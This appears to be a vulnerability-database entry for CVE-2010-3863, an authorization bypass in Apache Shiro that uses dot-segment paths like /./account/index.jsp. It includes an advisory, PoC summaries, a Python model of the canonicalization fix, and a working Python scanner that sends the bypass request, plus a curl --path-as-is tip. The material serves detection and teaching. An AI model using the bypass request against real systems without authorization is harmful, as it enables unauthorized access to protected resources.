CVE-2010-3863
Apache Shiro < 1.1.0 and JSecurity 0.9.x - Path Traversal via URI Path Bypass
Title source: llm
Exploitation Summary
EIP tracks 2 public exploits for CVE-2010-3863. PoCs published by Luke Taylor, sh1inroot-alt.
AI-analyzed exploit summary: The exploit sends a crafted HTTP GET request to an Apache Shiro 1.0.0 application with a dot segment in the URI path (for example /./account/index.jsp). Shiro compared the raw request path against the [urls] entries in shiro.ini without canonicalizing it first, so the dotted path matched no restricted entry and the request reached a resource that should have required authentication. The effect is an authorization filter bypass for URLs governed by shiro.ini, not file-system directory traversal: the servlet container still resolves the canonical resource, Shiro simply never recognizes it as protected.
Description
Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
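To make the mechanism concrete, the following added Python example (not code from EIP, from Apache Shiro, or from either PoC author) models a shiro.ini [urls] table with Ant-style patterns and evaluates the same request path the way Shiro before 1.1.0 did (raw match) and the way 1.1.0 does (canonicalize first). The [urls] table, the pattern translator and the canonicalize() helper are assumptions for illustration and are simplified relative to Shiro's AntPathMatcher.

```python
import re

# Constructed [urls] section in the style of shiro.ini, modelled on the protected
# /account/ area named in the advisory; not copied from any real application.
SHIRO_URLS = [
    ("/login.jsp", "authc"),
    ("/logout", "logout"),
    ("/account/**", "authc"),
    ("/**", "anon"),
]


def ant_to_regex(pattern):
    """Translate an Ant-style path pattern (shiro.ini [urls]) to a regex.
    '/**' matches zero or more further segments, '*' a run of non-slash
    characters, '?' one non-slash character. Simplified AntPathMatcher."""
    out = "^"
    i = 0
    while i < len(pattern):
        if pattern.startswith("/**", i):
            out += "(/.*)?"
            i += 3
        elif pattern.startswith("**", i):
            out += ".*"
            i += 2
        elif pattern[i] == "*":
            out += "[^/]*"
            i += 1
        elif pattern[i] == "?":
            out += "[^/]"
            i += 1
        else:
            out += re.escape(pattern[i])
            i += 1
    return re.compile(out + "$")


def first_matching_chain(path, urls=SHIRO_URLS):
    """First match wins, as in Shiro's [urls] processing."""
    for pattern, chain in urls:
        if ant_to_regex(pattern).match(path):
            return chain
    return None


def canonicalize(path):
    """RFC 3986 dot-segment removal: drop '.' and empty segments, resolve '..'.
    Returns None when the path tries to climb above the context root."""
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:
                return None
            segments.pop()
        else:
            segments.append(seg)
    result = "/" + "/".join(segments)
    if path.endswith("/") and result != "/":
        result += "/"  # keep a trailing slash so '/admin/' still reads as a directory
    return result


def vulnerable_chain(request_path):
    # Shiro < 1.1.0: the request path is matched against [urls] exactly as received.
    return first_matching_chain(request_path)


def fixed_chain(request_path):
    # Shiro 1.1.0 behaviour: canonicalize first, so '/./account/x' is matched as '/account/x'.
    path = canonicalize(request_path)
    if path is None:
        return "reject"
    return first_matching_chain(path)


if __name__ == "__main__":
    for p in ("/account/index.jsp", "/./account/index.jsp",
              "//account/index.jsp", "/account/../account/index.jsp"):
        print(f"{p:35} before: {vulnerable_chain(p):6} after: {fixed_chain(p)}")
```

The raw matcher sends /./account/index.jsp and //account/index.jsp down the anonymous chain because neither string starts with /account/; after canonicalization both collapse to /account/index.jsp and hit the authc entry. Any path that climbs above the context root is rejected outright rather than matched, which is the safer choice for a filter that runs before the application.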
Exploits (2)
A proof of concept that sends a crafted HTTP GET request to an Apache Shiro 1.0.0 application with a dot segment in the URI path, as in /./account/index.jsp. Because Shiro matched the raw path against shiro.ini without canonicalizing it, the request is served instead of being redirected to the login page. The result is an authorization bypass for URLs protected by shiro.ini, not arbitrary file reads from the file system.
The repository contains a YAML-based scanner for detecting CVE-2010-3863, the URI path normalization bypass in Apache Shiro. It requests the '/./admin/' path and reports the target as vulnerable when the response contains 'Account Info'.
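The check the scanner performs has a false-positive trap: a 200 on the dotted path proves nothing if the resource was never protected. The following added Python example (not the repository's scanner, not EIP code) makes the check two-sided by requesting the protected path as-is and then with a leading dot segment, and flags a bypass only when the first is denied and the second succeeds. The base URL, the /account/index.jsp probe path and the 'Account Info' marker are assumptions taken from the advisory text; the fetch callable is pluggable so the logic can be exercised offline.

```python
import http.client
from urllib.parse import urlsplit

MARKER = "Account Info"                        # body text the page's scanner looks for
DENIED = {301, 302, 303, 307, 308, 401, 403}   # what a protected URL normally returns


def http_get(url, timeout=5):
    """GET via http.client, which writes the request path byte-for-byte.
    That matters here: several HTTP clients squash '/./' before the request
    leaves, and the dot segment must reach the server exactly as written."""
    u = urlsplit(url)
    cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = cls(u.netloc, timeout=timeout)
    target = u.path + ("?" + u.query if u.query else "")
    conn.request("GET", target)
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, body


def check_cve_2010_3863(base_url, protected="/account/index.jsp", marker=MARKER, fetch=http_get):
    """Request the protected path as-is and with a leading '/.' segment.
    Only the pair proves a bypass: the direct request must be denied (redirect
    to login, 401 or 403, or at least no marker) and the dotted one must return
    200 with the marker."""
    base = base_url.rstrip("/")
    direct_status, direct_body = fetch(base + protected)
    bypass_status, bypass_body = fetch(base + "/." + protected)
    really_protected = direct_status in DENIED or marker not in direct_body
    bypassed = bypass_status == 200 and marker in bypass_body
    return {
        "direct": direct_status,
        "bypass": bypass_status,
        "vulnerable": really_protected and bypassed,
    }


if __name__ == "__main__":
    import sys
    # Constructed default target; pass the real base URL as the first argument.
    print(check_cve_2010_3863(sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080"))
```

Two practical caveats when running this against a real host: curl removes '/./' and '/../' sequences from the path by default, so reproduce the request with `--path-as-is`; and a reverse proxy or the servlet container in front of Shiro may normalize the path before Shiro sees it, which yields a clean result on this probe even though the application itself is still on a vulnerable Shiro version.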